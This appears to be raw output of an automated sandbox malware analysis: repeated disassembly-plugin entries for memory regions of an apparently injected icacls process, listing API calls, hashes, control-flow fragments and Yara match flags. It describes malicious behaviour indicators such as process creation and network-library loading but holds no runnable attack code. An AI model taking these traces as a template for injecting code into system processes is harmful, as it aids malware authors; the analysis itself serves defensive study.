                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 5fac10d75a0dba70f2a8aed8603bcaa36b792721bd4946da0a2d699e24654a8e
                                                                                                        • Instruction ID: 3164c46410b2a60e497cbd89b496c413c9b9ed0f4d4002a36acb0f225a90fb4b
                                                                                                        • Opcode Fuzzy Hash: 5fac10d75a0dba70f2a8aed8603bcaa36b792721bd4946da0a2d699e24654a8e
                                                                                                        • Instruction Fuzzy Hash: FC900269225504021145F558060850B049997D7351395C015F141E590CC72189696321
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 4fbdc1f098482d9e1a1581892df2050c21b32ec521e39468af92cdf1cae3c548
                                                                                                        • Instruction ID: a5cc2f321dd805c1bf5db5654ab3c57c68ad611f172ef8ddc2a25c41a6f63555
                                                                                                        • Opcode Fuzzy Hash: 4fbdc1f098482d9e1a1581892df2050c21b32ec521e39468af92cdf1cae3c548
                                                                                                        • Instruction Fuzzy Hash: 74900265605504425140B16888489064059ABE2211755C121B099C550D865989696665
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: f024e45e50a5e4f3447e70c91a9838d180cafe6f0d74733a78209c82c1efd1da
                                                                                                        • Instruction ID: 427df0ab31bf49116e3160ec026149f4d9aab3f81543aec3c17c91aa334288e9
                                                                                                        • Opcode Fuzzy Hash: f024e45e50a5e4f3447e70c91a9838d180cafe6f0d74733a78209c82c1efd1da
                                                                                                        • Instruction Fuzzy Hash: 3D900265215D0442E200B5684C18B07005987D1303F55C115B015C554CCA1589656521
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 6ae5bd837d81f93fceddf0d8596854a8fa99eb2eb01f2cd6c71595b103288481
                                                                                                        • Instruction ID: 0ea832682cd932623c5bf9a711f4be10bb2e1e0daa5b6f7a29986da9af5ddf77
                                                                                                        • Opcode Fuzzy Hash: 6ae5bd837d81f93fceddf0d8596854a8fa99eb2eb01f2cd6c71595b103288481
                                                                                                        • Instruction Fuzzy Hash: 749002A534550842E100B1584418B060059C7E2301F55C015F106C554D8719CD567126
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 5030aeaf2a0cd19328fddbdd7abb83dbf8d37b43fa7cc9f6071e85088df030dc
                                                                                                        • Instruction ID: 7a51aa20612d7814b00cc6b7cfbfdca5c3614b2ea0bb8955ba69cb1d6bebfce9
                                                                                                        • Opcode Fuzzy Hash: 5030aeaf2a0cd19328fddbdd7abb83dbf8d37b43fa7cc9f6071e85088df030dc
                                                                                                        • Instruction Fuzzy Hash: A690026560550902E101B1584408616005E87D1241F95C022B102C555ECB258A96B131
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: e4eac9761efce08adb851b79d23993b10da738c41717753fd8b4b2c67f51fd87
                                                                                                        • Instruction ID: 8a3373e938c6cc3d3e8d524d905d03cdab2440818f56f0a59153a800ea37ac85
                                                                                                        • Opcode Fuzzy Hash: e4eac9761efce08adb851b79d23993b10da738c41717753fd8b4b2c67f51fd87
                                                                                                        • Instruction Fuzzy Hash: 4C9002A520590803E140B5584808607005987D1302F55C011B206C555E8B298D557135
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 90bfc9913170ffd5dfbac011fb3bc5d7c842c9127fff976eac539ebe494d729e
                                                                                                        • Instruction ID: 6bd46dc498d79c7ba3346b23aebf6e1fbf424d5147a0993e8823336ee48d2b1e
                                                                                                        • Opcode Fuzzy Hash: 90bfc9913170ffd5dfbac011fb3bc5d7c842c9127fff976eac539ebe494d729e
                                                                                                        • Instruction Fuzzy Hash: 43900265246545526545F1584408507405A97E1241795C012B141C950C8626995AE621
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 6fb7f03f2b23caafcd0264ef52677fc94ce3df190393ad62a738848d3570bf1b
                                                                                                        • Instruction ID: 1bc82b76b12b17c0a462c6d56193a3cfd3185eef1cbeda2ff40a08cef8b36837
                                                                                                        • Opcode Fuzzy Hash: 6fb7f03f2b23caafcd0264ef52677fc94ce3df190393ad62a738848d3570bf1b
                                                                                                        • Instruction Fuzzy Hash: 6990027520550813E111B1584508707005D87D1241F95C412B042C558D97568A56B121
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: a2e1ec9b598ebbf34b758ec3c263d04614d3e33ccf627c3f8a107eb079d7275c
                                                                                                        • Instruction ID: 151b40a74abc8eac6d07776726d7dd3b61f42f8a8c52c8d10922e943690078f4
                                                                                                        • Opcode Fuzzy Hash: a2e1ec9b598ebbf34b758ec3c263d04614d3e33ccf627c3f8a107eb079d7275c
                                                                                                        • Instruction Fuzzy Hash: 6390026D21750402E180B158540C60A005987D2202F95D415B001D558CCA15896D6321
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: ecd677ed04534749e01f862d6fc9bbaf83f39db3d497c6cf8fe457828256dd3b
                                                                                                        • Instruction ID: 4d5cb88fcb9aaca86b4eeae3b848100249106da5b1d884473dab1726db4d056d
                                                                                                        • Opcode Fuzzy Hash: ecd677ed04534749e01f862d6fc9bbaf83f39db3d497c6cf8fe457828256dd3b
                                                                                                        • Instruction Fuzzy Hash: 0D90026530550403E140B158541C6064059D7E2301F55D011F041C554CDA15895A6222
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: ac5cf57344307d8ecc3e71f884708af2dfcf27d4ab16aca42c225213c447f37b
                                                                                                        • Instruction ID: 90f9624f825bf7237fea5a20dacd3c5df55794478c9084198d09e5465dc2aa5c
                                                                                                        • Opcode Fuzzy Hash: ac5cf57344307d8ecc3e71f884708af2dfcf27d4ab16aca42c225213c447f37b
                                                                                                        • Instruction Fuzzy Hash: EC90027520550802E100B598540C646005987E1301F55D011B502C555EC76589957131
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: b5498519f3de75b431465784092c691d93731e5af5c86ee0f0aac62a05cc0752
                                                                                                        • Instruction ID: dd18e2e52b5581243676347acb3fb548249b7245e213132097ffca177fd0e976
                                                                                                        • Opcode Fuzzy Hash: b5498519f3de75b431465784092c691d93731e5af5c86ee0f0aac62a05cc0752
                                                                                                        • Instruction Fuzzy Hash: 6590027520558C02E110B158840874A005987D1301F59C411B442C658D879589957121
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 399a9fc363e89b052cdcaad0856bbd1cc6145615db0789a4570b480ede56d1c1
                                                                                                        • Instruction ID: f5614a289e56e2b8a2499c1e64956399490f12b58b6cc8add09c972754b4a413
                                                                                                        • Opcode Fuzzy Hash: 399a9fc363e89b052cdcaad0856bbd1cc6145615db0789a4570b480ede56d1c1
                                                                                                        • Instruction Fuzzy Hash: 7C90027520550C42E100B1584408B46005987E1301F55C016B012C654D8715C9557521
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: 6bcdece0913c9f1d9ba7f337a33d378e7d7f693bc6787f734571a1c1730de755
                                                                                                        • Instruction ID: 4f24faa7dd3f353476b84bdc1d78932e007f1e3b36cb88b568d080f836c74822
                                                                                                        • Opcode Fuzzy Hash: 6bcdece0913c9f1d9ba7f337a33d378e7d7f693bc6787f734571a1c1730de755
                                                                                                        • Instruction Fuzzy Hash: 1E90027560960802E100B1584518706105987D1201F65C411B042C568D87958A5575A2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4432241042.00000000038B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 038B0000, based on PE: true
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039D9000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.00000000039DD000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        • Associated: 00000008.00000002.4432241042.0000000003A4E000.00000040.00001000.00020000.00000000.sdmp
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_38b0000_icacls.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: InitializeThunk
                                                                                                        • String ID:
                                                                                                        • API String ID: 2994545307-0
                                                                                                        • Opcode ID: ddbb4d465ce140364d86204897d5b7cec958bc41700b554c80bd3fe1637fe622
                                                                                                        • Instruction ID: 9885a72ea57494115d26372a91baad531ee3a80d8a5ecf4d4ebe52fa9a114632
                                                                                                        • Opcode Fuzzy Hash: ddbb4d465ce140364d86204897d5b7cec958bc41700b554c80bd3fe1637fe622
                                                                                                        • Instruction Fuzzy Hash: 3690026524955502E150B15C44086164059A7E1201F55C021B081C594D865589597221
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(dvvZj3l0,00000111,00000000,00000000), ref: 030CFE84
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: dvvZj3l0$dvvZj3l0
                                                                                                        • API String ID: 1836367815-3350356850
                                                                                                        • Opcode ID: 7273775570aa4973de71e31bd764de8f1869963554c5473c057e35e5fb4101c6
                                                                                                        • Instruction ID: 7a781df7129fcd3b4513c5edbed0f4d54f22bc110fc557ca527fb0e49fc1ae51
                                                                                                        • Opcode Fuzzy Hash: 7273775570aa4973de71e31bd764de8f1869963554c5473c057e35e5fb4101c6
                                                                                                        • Instruction Fuzzy Hash: CA01A1B6D4125C7ADB10EBE18C81DEFBB7CDF80694F058468F914AB141D6685E068BB2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 585 30cfe10-30cfe22 586 30cfe2a-30cfe77 call 30e9c90 call 30d3780 call 30c1410 call 30e0580 585->586 587 30cfe25 call 30e9280 585->587 596 30cfe79-30cfe88 PostThreadMessageW 586->596 597 30cfe97-30cfe9d 586->597 587->586 596->597 598 30cfe8a-30cfe94 596->598 598->597
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(dvvZj3l0,00000111,00000000,00000000), ref: 030CFE84
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: dvvZj3l0$dvvZj3l0
                                                                                                        • API String ID: 1836367815-3350356850
                                                                                                        • Opcode ID: 8cf8e5ec6f9f4bbde20132f79f47a2302329d8e04282672020436f59dca88a03
                                                                                                        • Instruction ID: f67a8008c9f3cb51c99d9b2d15e881d1f99c28b3ed72e9eac85a8706ea6d74cb
                                                                                                        • Opcode Fuzzy Hash: 8cf8e5ec6f9f4bbde20132f79f47a2302329d8e04282672020436f59dca88a03
                                                                                                        • Instruction Fuzzy Hash: 4101C4B6D4135C7EDB10EBE58C81DEFBBBCDF80694F048068F904AB140D6685E0687B2
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        Control-flow Graph

                                                                                                        control_flow_graph 599 30cfdc6-30cfe2f 601 30cfe35-30cfe77 call 30d3780 call 30c1410 call 30e0580 599->601 602 30cfe30 call 30e9c90 599->602 609 30cfe79-30cfe88 PostThreadMessageW 601->609 610 30cfe97-30cfe9d 601->610 602->601 609->610 611 30cfe8a-30cfe94 609->611 611->610
                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(dvvZj3l0,00000111,00000000,00000000), ref: 030CFE84
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: dvvZj3l0$dvvZj3l0
                                                                                                        • API String ID: 1836367815-3350356850
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • PostThreadMessageW.USER32(dvvZj3l0,00000111,00000000,00000000), ref: 030CFE84
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: MessagePostThread
                                                                                                        • String ID: dvvZj3l0$dvvZj3l0
                                                                                                        • API String ID: 1836367815-3350356850
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • Sleep.KERNELBASE(000007D0), ref: 030E1F2B
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Sleep
                                                                                                        • String ID: net.dll$wininet.dll
                                                                                                        • API String ID: 3472027048-1269752229
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CoInitialize.OLE32(00000000), ref: 030DDEE7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Initialize
                                                                                                        • String ID: @J7<
                                                                                                        • API String ID: 2538663250-2016760708
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CoInitialize.OLE32(00000000), ref: 030DDEE7
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Initialize
                                                                                                        • String ID: @J7<
                                                                                                        • API String ID: 2538663250-2016760708
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 030D37F2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: Load
                                                                                                        • String ID:
                                                                                                        • API String ID: 2234796835-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CreateProcessInternalW.KERNELBASE(030D02B0,030D02D8,030D00B0,00000000,030D7023,00000010,030D02D8,?,?,00000044,030D02D8,00000010,030D7023,00000000,030D00B0,030D02D8), ref: 030E7763
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateInternalProcess
                                                                                                        • String ID:
                                                                                                        • API String ID: 2186235152-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 030C90C2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,-00000002,?,00000000,00000000), ref: 030C90C2
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: CreateThread
                                                                                                        • String ID:
                                                                                                        • API String ID: 2422867632-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • RtlAllocateHeap.NTDLL(030D0A09,?,030E425D,030D0A09,030E3967,030E425D,?,030D0A09,030E3967,00001000,?,?,030E8ED0), ref: 030E765C
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
                                                                                                        Similarity
                                                                                                        • API ID: AllocateHeap
                                                                                                        • String ID:
                                                                                                        • API String ID: 1279760036-0
                                                                                                        Uniqueness

                                                                                                        Uniqueness Score: -1.00%

                                                                                                        APIs
                                                                                                        • RtlFreeHeap.NTDLL(00000000,00000004,00000000,025088C0,00000007,00000000,00000004,00000000,030D306C,000000F4,?,?,?,?,?), ref: 030E76AF
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000008.00000002.4431071745.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C0000, based on PE: false
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_8_2_30c0000_icacls.jbxd
                                                                                                        Yara matches
